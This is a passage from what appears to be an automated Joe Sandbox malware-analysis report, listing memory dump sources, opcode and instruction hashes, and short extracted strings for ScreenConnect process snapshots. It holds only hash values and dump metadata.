                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B5163746007058FCB28DF39D944A5AFBF5FF84310B144A68D466DB7A5EB30E98ACB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 68cd486adc23693a689480b0e39eac1fec386e2d2dd277f713619c3542e8cfa1
                                                                                                                                                                                                                                          • Instruction ID: 0043046bbe66b3d68e93328ba106bef02931642fa7edbcca89558db2980ab2ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68cd486adc23693a689480b0e39eac1fec386e2d2dd277f713619c3542e8cfa1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC318F30B202168BDB18DE69C455AAFFBF5EF89354F00886AE416E7354DF31DC059B91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c851ccdef388eb380dcef8fad4bbd5c49c489943bea1592b1914b6cdc9eca544
                                                                                                                                                                                                                                          • Instruction ID: f4754f03975f5f84118cd3dc8c9a9e3872e76f13668a42fdc75ed051a92e127b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c851ccdef388eb380dcef8fad4bbd5c49c489943bea1592b1914b6cdc9eca544
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9031A170B146558FCB09DB6CC8505AEFFB2EFC6310B1481AAD949DB395DB309D06C791
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3f7d2ea999be138ec0bdbb182d9364163ad7961fe3b9b4e5c8a72ac1f0f36b8a
                                                                                                                                                                                                                                          • Instruction ID: 5f7c6c686ef1f43e80a3294d37d2721b0759f2b58df190c5fcf039a3bcc1ea09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f7d2ea999be138ec0bdbb182d9364163ad7961fe3b9b4e5c8a72ac1f0f36b8a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91314F706007018FC778DF29D884966BBF2EF89320B144A2CE456DB7A5D730E946CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 51f4dfd14bfc38177cbd5305c6af28ca01c89936789e1c528ef9ec53478d0811
                                                                                                                                                                                                                                          • Instruction ID: cdb1d1b52174816cd730a07b98ac32f63c170c121e77f821b48b9d6b87d90945
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51f4dfd14bfc38177cbd5305c6af28ca01c89936789e1c528ef9ec53478d0811
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1421D2707002115FC708EB68E990B6EBBE6EFC5220F048965D515EB358DF70AD09C7D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 54e7b5bcbffa1c8e787b55e69b6292753471b311edbc19d845b1128fe5fa830f
                                                                                                                                                                                                                                          • Instruction ID: 30ecb9dc27ad6f0e85925e32b8f71076e17940d45e5c7cbfa2d73ceb0e8a7b65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e7b5bcbffa1c8e787b55e69b6292753471b311edbc19d845b1128fe5fa830f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00219071E002049FEB69DF69E8009EEBBB3AFC4311F08847AE555DB2A4D7719A05CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4b3fbd7736a0268a5d2899c079ee05eb478f32319e5374735829772d0986862c
                                                                                                                                                                                                                                          • Instruction ID: e03877119deb92a5406e1af34684be8fd75df86330943faaa88afa274f136721
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b3fbd7736a0268a5d2899c079ee05eb478f32319e5374735829772d0986862c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D2131302006058FD738CF29D948696BBF5EF48310B108B2DD5A297AA5DB31E989CF80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 486a5c5f8fe1eb9dce681f0589beafdb630256ca1be2a8c97bb0f01948c2ee5d
                                                                                                                                                                                                                                          • Instruction ID: c2d7ab796a2a2487cebf97bd813219a2f4b222c782c234384b6e00129b0e7472
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 486a5c5f8fe1eb9dce681f0589beafdb630256ca1be2a8c97bb0f01948c2ee5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B11D070B002115BC708EB68E950B6EFBA6EFC4220F008929D919AB358DF70AD0987D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9674a1886499bfaaf8bad70ae0f393292a53ef6466e966d708a2cf5abcf7da9b
                                                                                                                                                                                                                                          • Instruction ID: d60f813e848d9d8c61cce4015d50f0711a1322cacdc0cf2653b5ade1ccc48326
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9674a1886499bfaaf8bad70ae0f393292a53ef6466e966d708a2cf5abcf7da9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 521104327012548FC714CB6CE88099EBBBAEFC5360B148676E405CB369DB71DD46C7A0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: df8d49d1237fbb3199cdbc087b8cc5588ae34d25adcf8194111b4017ec82acfa
                                                                                                                                                                                                                                          • Instruction ID: 8af0f2abe7f1cee3187ad80bf54e730d6bc2e4c05e7b15fa6e1f3ca4cca3ad94
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df8d49d1237fbb3199cdbc087b8cc5588ae34d25adcf8194111b4017ec82acfa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05114231A4021A9FCF40DFA8C9409DEFBB1FF49314B108166D608BB265E771AA1ACBD0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2522146462.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_111d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2522146462.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_111d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 71bc0e289b51f367b341501383f19cbfcadafec7226eb539b52550527cd3852a
                                                                                                                                                                                                                                          • Instruction ID: 0dc2c039d33786db4538b9e9f65e622f79f76ada74ab87a36ca3ccac803803be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71bc0e289b51f367b341501383f19cbfcadafec7226eb539b52550527cd3852a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0C8714043449EEB158A19DC88762FF98EF41264F18C46AED480E286C3795845CAB0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: da17a4d3a2c56e06cf37425df06aabb5ec9b5eff6d09b54f650e4d993974fa8f
                                                                                                                                                                                                                                          • Instruction ID: ca45212ae050d4bbae10205cc1d3f48168a754db634ff3515928a775437d40f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da17a4d3a2c56e06cf37425df06aabb5ec9b5eff6d09b54f650e4d993974fa8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F0EC72A0C384AFC715CBBA58505977FED8F86214B0480BFD54DC3241F5249506C735
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7a1eb9ecdae960d9299a95b147a746dc787a67e5f77c2293eb1aeef62a3b80dc
                                                                                                                                                                                                                                          • Instruction ID: 340774f6a12b60f5255640dddc884769ddc675a077c7e020633c2504a5900c51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a1eb9ecdae960d9299a95b147a746dc787a67e5f77c2293eb1aeef62a3b80dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF05C713013505BC7090FAA788812AFFEAFFC6234740417AE249D7395CF704C4583A0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 62341034eb227b50c6b062c30fdd838a2aa7efc5d90416a78c7d0c76e0bb4cc9
                                                                                                                                                                                                                                          • Instruction ID: 5eaccfe1e1b3990fac931ad7bf92d14fd5705c51eb7ccf51b34aefa06cca34a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62341034eb227b50c6b062c30fdd838a2aa7efc5d90416a78c7d0c76e0bb4cc9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40F02B7200C2908FD31A9778AC117997FB5EF93220B4905DAD081CF16AD75CA509C351
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 337041529e056bd4d079c1b7eeae23c4a52e3d3b1137913e4eac0bcda9c0b3ef
                                                                                                                                                                                                                                          • Instruction ID: eabe1cfe733481c57b901cc7b3368beb3e5f516de32184f6da2bce80bae51ba1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 337041529e056bd4d079c1b7eeae23c4a52e3d3b1137913e4eac0bcda9c0b3ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4F0E532B019924FCB59462C98442A4BBF68B47265F2D82B1F416CF342F731CC828783
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 55135d960db299c9dfe90aebbd0488e9f9f0d3ce2cecdbc5c4168f2cac838624
                                                                                                                                                                                                                                          • Instruction ID: a13444113d15a8704df8863391b013df8958b1ade22595333e19abeef2a64b42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55135d960db299c9dfe90aebbd0488e9f9f0d3ce2cecdbc5c4168f2cac838624
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0A0353002505B831AA65DA55095E7BA9EBC8660310842DD45AD7308DF30EC059BD0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 11a9e9260ebe664f8092d9300e99c2bf5f96a0e97ad7d1665fb9e89d68cde1fc
                                                                                                                                                                                                                                          • Instruction ID: b4b32fb5bf6eeb1042f01a3772a9bac9b43249e7d5de82d1d42c0c773da7bd11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11a9e9260ebe664f8092d9300e99c2bf5f96a0e97ad7d1665fb9e89d68cde1fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE06D32B10310AFC3695F3CA4185AE7BA6AFEA2713214177E956C3399CF348D52CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27953f31bbfb98c73a9c318331abcff17cb7c2204bd4b702beda3adf11092af9
                                                                                                                                                                                                                                          • Instruction ID: 5ff79e7c5e3594f731b10b08a18953144f4f522a724834ee58022e924977f916
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27953f31bbfb98c73a9c318331abcff17cb7c2204bd4b702beda3adf11092af9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50E0DF31700320579B181A9E748822FBEEAFFC8675350803DE60AC3344CFB18C1683E4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                                                                          • API String ID: 0-4248691736
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                                                                          • API String ID: 0-4248691736
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-127220927
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ;$$c"
                                                                                                                                                                                                                                          • API String ID: 0-3747028598
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ;$$c"
                                                                                                                                                                                                                                          • API String ID: 0-3747028598
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (&]q$(aq
                                                                                                                                                                                                                                          • API String ID: 0-1602648543
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: H$nCuq
                                                                                                                                                                                                                                          • API String ID: 0-3135758294
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: `Q]q$`Q]q
                                                                                                                                                                                                                                          • API String ID: 0-3952371890
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-127220927
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: nCuq
                                                                                                                                                                                                                                          • API String ID: 0-4247494828
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q
                                                                                                                                                                                                                                          • API String ID: 0-1007455737
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
